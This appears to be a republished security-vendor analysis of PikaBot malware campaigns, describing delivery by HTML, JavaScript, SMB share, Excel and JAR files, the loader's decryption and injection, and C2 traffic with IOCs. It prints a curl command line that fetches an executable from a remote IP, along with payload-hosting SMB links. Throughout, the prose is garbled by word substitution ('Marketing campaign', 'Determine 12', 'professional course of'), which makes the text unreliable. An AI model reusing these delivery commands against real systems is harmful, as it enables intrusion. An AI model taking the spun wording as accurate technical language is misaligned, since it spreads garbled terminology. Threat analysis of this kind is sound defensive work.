Friday, December 20, 2024

Distinctive Marketing campaign Evolution of Pikabot Malware

Authored by Anuradha and Preksha

Introduction

PikaBot is a malicious backdoor that has been lively since early 2023. Its modular design is comprised of a loader and a core part. The core module performs malicious operations, permitting for the execution of instructions and the injection of payloads from a command-and-control server. The malware employs a code injector to decrypt and inject the core module right into a professional course of. Notably, PikaBot employs distribution strategies, campaigns, and habits paying homage to Qakbot.

Distribution Strategies

PikaBot, together with numerous different malicious loaders like QBot and DarkGate, closely depends upon e-mail spam campaigns for distribution. Its preliminary entry methods are intricately crafted, using geographically focused spam emails tailor-made for particular nations. These emails regularly embrace hyperlinks to exterior Server Message Block (SMB) shares internet hosting malicious zip recordsdata.

SMB shares confer with sources or folders on a server or pc accessible to different units or customers on a community utilizing the SMB protocol. The risk actors regularly exploit such shares for malware distribution. On this occasion, the act of downloading and opening the supplied zip file results in PikaBot an infection.

Distinctive Campaigns

Throughout February 2024, McAfee Labs noticed a major change within the campaigns that distribute Pikabot.

Pikabot is distributed by way of a number of file sorts for numerous causes, relying on the targets and nature of the assault. Utilizing a number of file sorts permits attackers to take advantage of various assault vectors. Totally different file codecs could have completely different vulnerabilities, and other ways of detection by safety software program so attackers could strive numerous codecs to extend their possibilities of success and evade detection by bypassing particular safety measures.

Attackers typically use file sorts which might be generally trusted by customers, similar to Zip or Workplace paperwork, to trick customers into opening them. By utilizing acquainted file sorts, attackers enhance the probability that their targets will work together with the malicious content material. Malware authors use HTML with JavaScript options as attachments, a typical approach, notably when e-mail formatting is transformed to plain textual content, ensuing within the attachment of the HTML content material on to the e-mail. Attackers use SMB to propagate throughout the community and will particularly goal SMB shares to unfold their malware effectively. Pikabot takes benefit of the MonikerLink bug and attaches an SMB hyperlink within the Outlook mail itself.

Determine 1. Distinctive Campaigns of Pikabot

Attackers demonstrated a various vary of strategies and an infection vectors in every marketing campaign, aiming to ship the Pikabot payload. Beneath we’ve got summarized the an infection vector that has been utilized in every marketing campaign.

  1. HTML
  2. Javascript
  3. SMB Share
  4. Excel
  5. JAR

It’s unusual for an adversary to deploy so many assault vectors within the span of a month.

Marketing campaign Evaluation

On this part, a complete breakdown of the evaluation for every marketing campaign is introduced under.

1.HTML Marketing campaign

On this marketing campaign, Pikabot is distributed by way of a zipper file that features an HTML file. This HTML file then proceeds to obtain a textual content file, in the end ensuing within the deployment of the payload.

The under HTML code is a snippet from the malware the place it’s a correctly aligned HTML that has a physique meta redirection to a distant textual content file hosted on the specified URL. There are distractions within the HTML which aren’t rendered by the browser.

Determine 2.HTML Code

The above highlighted meta tag triggers an instantaneous refresh of the web page and redirects the browser to the desired URL: ‘file://204.44.125.68/mcqef/yPXpC.txt’. This seems to be a file URL, pointing to a textual content file on a distant server.

Listed below are some the explanation why an attacker may select a meta tag refresh over conventional redirects:

Stealth and Evasion: Meta tag refreshes could be much less conspicuous than HTTP redirects. Some safety instruments and detection mechanisms could also be extra targeted on figuring out and blocking recognized redirect patterns.

Shopper-Aspect Execution: Meta tag refreshes happen on the consumer aspect (within the consumer’s browser), whereas HTTP redirects are sometimes dealt with by the server. This will likely enable attackers to execute sure actions straight on the consumer’s machine, making detection and evaluation tougher.

Dynamic Habits: Meta tag refreshes could be dynamically generated and inserted into net pages, permitting attackers to vary the redirection targets extra simply and regularly. This dynamic habits could make it tougher for safety techniques to maintain up with the evolving risk panorama.

On this marketing campaign, McAfee blocks the HTML file.

Determine 3.HTML file

2. Javascript Marketing campaign

Distributed by way of a compressed zip file, the package deal features a .js file that subsequently initiates the execution of curl.exe to retrieve the payload.

An infection Chain:

.zip->.js->curl->.exe

Code snippet of .js file:

Determine 4. Javascript Code

When the JavaScript is executed, it triggers cmd.exe to generate directories on the C: drive and initiates curl.exe to obtain the payload.

For the reason that URL “hxxp://103.124.105.147/KNaDVX/.dat” is inactive, the payload isn’t downloaded to the under location.

Commandline:

‘”C:WindowsSystem32cmd.exe” /c mkdir C:DthfgjhjfjRkfjsilEjkjhdgjfByfjgkgdfh & curl hxxp://103.124.105.147/KNaDVX/0.2642713404338389.dat –output C:DthfgjhjfjRkfjsilEjkjhdgjfByfjgkgdfhNgjhjhjda.exe’

McAfee blocks each the javascript and the exe file thus rendering McAfee clients secure from this marketing campaign.

Determine 5. JS file

Determine 6. EXE file

3. SMB share Marketing campaign:

On this marketing campaign, Malware leverages the MonikerLink bug by distributing malware by way of e-mail conversations with older thread discussions, whereby recipients obtain a hyperlink to obtain the payload from an SMB share. The hyperlink is straight current in that Outlook mail.

An infection Chain:

EML ->SMB share link->.zip->.exe

Spam E-mail:

Determine 7. Spam e-mail with SMB share hyperlink

SMB Share hyperlink: file://newssocialwork.com/public/FNFY.zip

On this marketing campaign, McAfee efficiently blocks the executable file downloaded from the SMB share.

Determine 8. EXE file

 4: Excel Marketing campaign

Determine 9. Face in Excel

An infection Chain:

.zip >.xls > .js > .dll

This week, risk actors launched a novel methodology to distribute their Pikabot malware. Focused customers obtained an Excel spreadsheet that prompted them to click on on an embedded button to entry “recordsdata from the cloud.”

Upon hovering over the “Open” button, we will discover an SMB file share hyperlink -file:///85.195.115.20sharereports_02.15.2024_1.js.

Bundled recordsdata in Excel:

Determine 10. Bundled recordsdata inside Excel

The Excel file doesn’t incorporate any macros however features a hyperlink directing to an SMB share for downloading the JavaScript file.

The hyperlink is current within the under relationship file.

Determine 11. XML relationship file

Content material of relationship file:

Determine 12. xl/drawings/_rels/drawing1.xml.rels

Code of JS file:

Determine 13. Obfuscated javascript code

The JS file comprises principally junk codes and a small piece of malicious code which downloads the payload DLL file saved as “nh.jpg”.

Determine 14. Calling regsvr32.exe

The downloaded DLL payload is executed by regsvr32.exe.

On this marketing campaign, McAfee blocks the XLSX file.

Determine 15. XLSX file

5. JAR Marketing campaign

On this marketing campaign, distribution was by way of a compressed zip file, the package deal features a .jar file which on execution drops the DLL file as payload.

An infection Chain:

.zip>.jar>.dll

On extraction, the under recordsdata are discovered contained in the jar file.

Determine 16. Extraction of JAR file

The MANIFEST file signifies that hBHGHjbH.class serves as the primary class within the supplied recordsdata.

The jar file on execution hundreds the file “163520” as a useful resource and drops it as .png to the %temp% location which is the payload DLL file.

Determine 17. Payload with .png extension

Following this, java.exe initiates the execution of regsvr32.exe to run the payload.

On this marketing campaign, McAfee blocks each the JAR and DLL recordsdata.

Determine 18. JAR file

Determine 19. DLL file

Pikabot Payload Evaluation:

Pikabot loader:

On account of a comparatively excessive entropy of the useful resource part, the pattern seems packed.

Determine 20. Loader Entropy

Initially, Malware allocates reminiscence utilizing VirtualAlloc (), and subsequently, it employs a customized decryption loop to decrypt the information, leading to a PE file

Determine 21. Decryption Loop

Determine 22. Decrypted to get the PE file

Core Module:

As soon as the information is decrypted, it proceeds to leap to the entry level of the brand new PE file. When this PE file will get executed, it injects the malicious content material in ctfmon.exe with the command line argument “C:WindowsSysWOW64ctfmon.exe -p 1234”

Determine 23. Injection with ctfmon.exe

To forestall double an infection, it employs a hardcoded mutex worth {9ED9ADD7-B212-43E5-ACE9-B2E05ED5D524} by calling CreateMutexW(), adopted by a name to GetLastError() to verify the final error code.

Determine 24. Mutex

Community communication:

Malware collects the information from the sufferer machine and sends it to the C2 server.

Determine 25. Community exercise

PIKABOT performs community communication over HTTPS on non-traditional ports (2221, 2078, and so on).

Determine 26. Community exercise

C2 server communication:

Determine 27. C2 communication

IOCs:

C2 discovered within the payload are:

178.18.246.136:2078

86.38.225.106:2221

57.128.165.176:1372

File Sort SHA 256
ZIP 800fa26f895d65041ddf12c421b73eea7f452d32753f4972b05e6b12821c863a
HTML 9fc72bdf215a1ff8c22354aac4ad3c19b98a115e448cb60e1b9d3948af580c82
ZIP 4c29552b5fcd20e5ed8ec72dd345f2ea573e65412b65c99d897761d97c35ebfd
JS 9a4b89276c65d7f17c9568db5e5744ed94244be7ab222bedd8b64f25695ef849
EXE 89dc50024836f9ad406504a3b7445d284e97ec5dafdd8f2741f496cac84ccda9
ZIP f3f1492d65b8422125846728b320681baa05a6928fbbd25b16fa28b352b1b512
EXE aab0e74b9c6f1326d7ecea9a0de137c76d52914103763ac6751940693f26cbb1
XLSX bcd3321b03c2cba73bddca46c8a509096083e428b81e88ed90b0b7d4bd3ba4f5
JS 49d8fb17458ca0e9eaff8e3b9f059a9f9cf474cc89190ba42ff4f1e683e09b72
ZIP d4bc0db353dd0051792dd1bfd5a286d3f40d735e21554802978a97599205bd04
JAR d26ab01b293b2d439a20d1dffc02a5c9f2523446d811192836e26d370a34d1b4
DLL 7b1c5147c903892f8888f91c98097c89e419ddcc89958a33e294e6dd192b6d4e

 

 

Introducing McAfee+

Identification theft safety and privateness in your digital life



Related Articles

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Latest Articles